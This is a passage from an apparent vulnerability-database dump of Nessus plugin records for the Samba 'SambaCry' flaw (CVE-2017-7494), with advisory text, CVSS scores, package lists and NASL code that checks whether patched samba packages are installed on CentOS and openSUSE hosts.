(rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-clients-4.2.10-10.el6_9\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"samba4-winbind-krb5-locator-4.2.10-10.el6_9\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba4 / samba4-client / samba4-common / samba4-dc / samba4-dc-libs / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:32:54", "description": "This update for samba fixes the following issue :\n\n - An unprivileged user with access to the samba server\n could cause smbd to load a specially crafted shared\n library, which then had the ability to execute arbitrary\n code on the server as 'root'. [CVE-2017-7494, bso#12780,\n bsc#1038231]\n\nThis update was imported from SUSE:SLE-12-SP1:Update project.\n\nNOTE: This update is released in openSUSE Leap 42.1 after its official\nEnd Of Life only because of its severity and potential impact for\nusers that have not migrated yet.\n\nPlease upgrade your openSUSE Leap 42.1 as soon as possible.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-30T00:00:00", "title": "openSUSE Security Update : samba (openSUSE-2017-618) (SambaCry)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "modified": "2017-05-30T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc-devel", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:ctdb", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbldap0", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy0-32bit", "p-cpe:/a:novell:opensuse:libsamdb0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-standard-devel", "p-cpe:/a:novell:opensuse:libsamba-passdb0", "p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit", "p-cpe:/a:novell:opensuse:libregistry0-debuginfo", "p-cpe:/a:novell:opensuse:samba-python-debuginfo", "p-cpe:/a:novell:opensuse:libregistry0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libsamba-policy0", "p-cpe:/a:novell:opensuse:libndr-nbt-devel", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:libregistry0-32bit", "p-cpe:/a:novell:opensuse:samba-libs-debuginfo", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb-devel", "p-cpe:/a:novell:opensuse:libgensec0", "p-cpe:/a:novell:opensuse:libdcerpc-samr-devel", "p-cpe:/a:novell:opensuse:libsmbclient-raw0", "p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libregistry-devel", "p-cpe:/a:novell:opensuse:libndr-standard0", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:opensuse:libsamdb0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-test", "p-cpe:/a:novell:opensuse:libsmbconf-devel", "p-cpe:/a:novell:opensuse:libsmbclient0-32bit", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo-32bit", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-32bit", "p-cpe:/a:novell:opensuse:samba-winbind", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-test-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials-devel", "p-cpe:/a:novell:opensuse:libndr-standard0-32bit", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0", "p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsamdb0", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac-devel", "p-cpe:/a:novell:opensuse:libsmbclient0", "p-cpe:/a:novell:opensuse:samba-libs-32bit", "p-cpe:/a:novell:opensuse:libndr-krb5pac0", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:libndr-devel", "p-cpe:/a:novell:opensuse:libgensec-devel", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit", "p-cpe:/a:novell:opensuse:libndr-nbt0-32bit", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba-32bit", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-winbind-debuginfo", "p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-pidl", "p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libnetapi0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libndr0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0", "p-cpe:/a:novell:opensuse:samba-winbind-32bit", "p-cpe:/a:novell:opensuse:libnetapi-devel", "p-cpe:/a:novell:opensuse:libnetapi0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel", "p-cpe:/a:novell:opensuse:libsamdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:libsmbclient-raw-devel", "p-cpe:/a:novell:opensuse:libsamba-credentials0", "p-cpe:/a:novell:opensuse:libdcerpc0-32bit", "p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo", "p-cpe:/a:novell:opensuse:libgensec0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:samba-test-devel", "p-cpe:/a:novell:opensuse:libsmbclient-devel", "p-cpe:/a:novell:opensuse:libdcerpc-samr0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:samba-libs", "p-cpe:/a:novell:opensuse:libnetapi0", "p-cpe:/a:novell:opensuse:libsmbclient-raw0-32bit", "p-cpe:/a:novell:opensuse:libsamba-policy-devel", "p-cpe:/a:novell:opensuse:libndr0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:ctdb-debuginfo", "p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo-32bit", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:samba-python", "p-cpe:/a:novell:opensuse:ctdb-devel", "p-cpe:/a:novell:opensuse:libdcerpc-binding0", "p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo", "p-cpe:/a:novell:opensuse:libregistry0", "p-cpe:/a:novell:opensuse:libndr0", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo", "p-cpe:/a:novell:opensuse:libdcerpc-devel", "p-cpe:/a:novell:opensuse:libsmbldap0-32bit", "p-cpe:/a:novell:opensuse:ctdb-tests", "p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit"], "id": "OPENSUSE-2017-618.NASL", "href": "https://www.tenable.com/plugins/nessus/100499", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-618.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100499);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-7494\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2017-618) (SambaCry)\");\n script_summary(english:\"Check for the openSUSE-2017-618 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for samba fixes the following issue :\n\n - An unprivileged user with access to the samba server\n could cause smbd to load a specially crafted shared\n library, which then had the ability to execute arbitrary\n code on the server as 'root'. [CVE-2017-7494, bso#12780,\n bsc#1038231]\n\nThis update was imported from SUSE:SLE-12-SP1:Update project.\n\nNOTE: This update is released in openSUSE Leap 42.1 after its official\nEnd Of Life only because of its severity and potential impact for\nusers that have not migrated yet.\n\nPlease upgrade your openSUSE Leap 42.1 as soon as possible.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1038231\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba is_known_pipename() Arbitrary Module Load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-atsvc0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libgensec0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libregistry0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-raw0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/26\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release 